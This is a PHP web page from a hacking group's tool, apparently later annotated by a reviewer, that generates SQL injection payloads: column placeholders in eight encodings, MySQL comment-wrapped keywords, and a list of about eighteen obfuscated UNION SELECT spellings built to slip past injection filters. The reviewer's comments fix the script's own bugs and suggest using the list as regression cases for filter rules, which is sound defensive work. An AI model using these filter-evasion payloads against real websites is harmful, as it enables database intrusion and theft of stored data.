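<!DOCTYPE html>
<html>
<head>
<title>Bypass Orders SQL injection</title>
</head>
<body>
<form method='POST'><center>
<h3>Bypass Orders SQL injection</h3>
<pre>bypass numbers</pre>
<select name='Numper'>
<option value='bypass 1'>hex</option>
<option value='bypass 2'>()</option>
<option value='bypass 3'>hexx</option>
<option value='bypass 4'>null</option>
<option value='bypass 5'>%2</option>
<option value='bypass 6'>/*!*/</option>
<option value='bypass 7'>unhex</option>
<option value='bypass 8'>%0A</option>
</select>
<input type='text' name='ips' />
<input type='submit' name='start' value='Go' />
</center></form>
<pre>
<?php
// Author : Hack 109
// IQ-Team
// open source
//
// What this page does: three independent form handlers that only format and
// print text. Nothing in this file opens a database connection or sends a
// request.
//   1. "start": prints N comma-separated placeholders in one of eight encodings.
//   2. "ok":    wraps one submitted word in MySQL comment syntax.
//   3. "yes":   prints a fixed list of UNION SELECT spellings, each followed
//               by the sequence 1,2,...,N.
//
// Review changes, all to the script's own handling of request data:
//   * The word from the "un" field was echoed into the page unescaped
//     (reflected XSS). It is now passed through htmlspecialchars().
//   * Both count fields were used as raw strings in the loop condition while
//     set_time_limit(0) removed the execution limit. A very large value ran
//     unbounded, and under PHP 8's string/number comparison rules a
//     non-numeric value appears never to terminate the loop. Counts are now
//     digits-only and capped at MAX_ITEMS.
//   * The blanket @error_reporting(0) is gone; request fields are checked
//     before use and accumulators are initialised.
// The string-building expressions inside each case are reproduced as they
// were, including their quirks, which are called out where they occur.

// Upper bound for either count field. Reviewer-chosen value, adjust as needed.
const MAX_ITEMS = 1000;

/**
 * Return a POST field as a trimmed string, or '' when it is missing or is
 * not a plain string (for example an array submitted as field[]).
 */
function postedText($field)
{
    if (!isset($_POST[$field]) || !is_string($_POST[$field])) {
        return '';
    }

    return trim($_POST[$field]);
}

/**
 * Return a POST field as an integer in the range 0..$max.
 *
 * Anything other than a run of decimal digits yields 0, so the loops below
 * simply do not execute for malformed input.
 */
function postedCount($field, $max)
{
    $raw = postedText($field);
    if ($raw === '' || !ctype_digit($raw)) {
        return 0;
    }
    // More than nine digits cannot be below any sensible cap; return early
    // instead of relying on how the integer cast treats oversized values.
    if (strlen($raw) > 9) {
        return $max;
    }

    return min((int) $raw, $max);
}

// ---- Handler 1: N placeholders in the selected encoding -------------------
// Only the loop counter and fixed literals are printed here; no submitted
// text reaches the output.
if (!empty($_POST['start'])) {
    $Numper = postedText('Numper');
    $i = postedCount('ips', MAX_ITEMS);
    for ($ips = 1; $ips <= $i; $ips++) {
        switch ($Numper) {
            case 'bypass 1':
                // The original concatenated an unset $x after 'kw', so the
                // hex value is the same constant for every position.
                echo '0x' . bin2hex('kw') . ',';
                break;
            case 'bypass 2':
                echo '(' . $ips . ')' . ',';
                break;
            case 'bypass 3':
                echo '0x' . bin2hex('!~kw' . ':' . $ips) . bin2hex($ips . '~!') . ',';
                break;
            case 'bypass 4':
                // This inner loop advances the outer counter itself, so the
                // whole output is produced during the first outer pass.
                for (; $ips <= $i; $ips++) {
                    echo 'NULL' . ',';
                }
                break;
            case 'bypass 5':
                // Shares the outer counter as well; note the strict "<".
                for (; $ips < $i; $ips++) {
                    // NOTE(review): subtracts a non-numeric string. PHP 7
                    // warned and treated it as 0; PHP 8 raises a TypeError
                    // for this operand. Kept exactly as in the original.
                    $zx = ($ips - '%2C');
                    echo $ips . '%2C' . $zx;
                }
                break;
            case 'bypass 6':
                echo '/*!' . $ips . '*/' . ',';
                break;
            case 'bypass 7':
                echo 'unhex(hex(' . $ips . '))' . ',';
                break;
            case 'bypass 8':
                // Accumulator was never initialised in the original.
                $xaa = '';
                for (; $ips <= $i; $ips++) {
                    $xaa .= '+%0A' . ',';
                }
                echo $xaa;
                break;
        }
    }
}

echo "<hr />";
// The text input and submit button were nested inside <select> and the
// closing tags were crossed; both are straightened out here.
echo "<form method='POST'><center>
<pre>Just one word</pre>
<select name='filter'>
<option >Filter</option>
<option >Filter2</option>
</select>
<input type='text' name='un' />
<input type='submit' name='ok' value='Go' />
</center></form>";

// ---- Handler 2: wrap one submitted word in comment syntax -----------------
// This is the only handler that prints submitted text, so it is the only
// place that needs HTML escaping.
if (!empty($_POST['ok'])) {
    $un = postedText('un');
    $filter = postedText('filter');
    switch ($filter) {
        case 'Filter':
            $cap = "/**//*!" . strtoupper($un) . "*//**/";
            // Replacing $un within itself yields $cap, or '' when $un is empty.
            $ux = str_replace($un, $cap, $un);
            echo htmlspecialchars($ux, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
            break;
        case 'Filter2':
            $cap1 = "/**//*!12345" . strtoupper($un) . "*//**/";
            $ux1 = str_replace($un, $cap1, $un);
            echo htmlspecialchars($ux1, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
            break;
    }
}

echo "<hr />";
echo "<form method='POST'><center>
<pre>Input Numbers &gt; Show Output = Union+Select+N</pre>
<input type='text' name='vn' />
<input type='submit' name='yes' value='Go' />
</center></form>";

// ---- Handler 3: fixed keyword spellings followed by 1..N ------------------
if (!empty($_POST['yes'])) {
    $i = postedCount('vn', MAX_ITEMS);
    $x = '';
    for ($pp = 1; $pp <= $i; $pp++) {
        $x .= $pp . ',';
    }

    // Defender note: every entry is the same UNION SELECT keyword pair,
    // re-spelled with MySQL conditional comments (/*!NNNNN ... */), empty
    // comments, percent-encoded whitespace (%0A, %0b, %0D%0A, %20),
    // percent-encoded letters (%55, %53), mixed case, or keywords split by a
    // comment. Rules that match the literal keywords miss these unless the
    // request is URL-decoded and comment-normalised before matching, which
    // makes the list usable as regression cases for filter rules. Queries
    // built with bound parameters are unaffected by any of these spellings.
    // Two entries occur twice in the original list and are kept as they were.
    $a = array(
        "/*!UNION*/ /*!%0ASELECT*/",
        "/*!%0AUNION*/ /*!%0ASELECT*/",
        "/**//*!12345UNION SELECT*//**/",
        "/**//**//*!12345UNiON*//**//**//*!12345ALL*//**//**//*!12345SELECT*//**//**/",
        "/**//**//*!50000%55NION*//**//**//*!50000%53ELECT*//**//**/",
        "/**//*!12345UNION SELECT*//**/",
        "+union+distinct+select+",
        "+union+distinctROW+select+",
        "%20/*!12345UNION*/%20/*!12345SELECT*/%20%201",
        "/*_*/%2f%2a%2120000union%2a%2f/*,*/%2f%2a%2120000SelEct%2a%2f/*,*/",
        "null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/",
        "/**/un/**/ion+se/**/lect/**/",
        "/*,*/uni%0bon+se%0blect/*,*/",
        "/*_*//*!20000%0D%0Aunion*/+/*!20000%0D%0ASelEct*//*_*/",
        "/**//**//*!12345%55nIoN*//**//**//*!12345%53ElEcT*//**//**/",
        "/*!12345%0AUNION*/ /*!12345%0ASELECT*/",
        "/*!12345UNION*/ /*!12345SELECT*/",
        "/*!%0AUNION*/ /*!%0ASELECT*/",
    );
    foreach ($a as $ari) {
        echo $ari . $x . "<hr>";
    }
}
?>
<h3>Greats To ALL Members In<a href="http://www.iq-team.org/" tabindex="1"> IQ-Team </a></h3>
<center> Coded by : Hack 109 </center>
<center>© IQ-Team</center>
</pre>
</body>
</html>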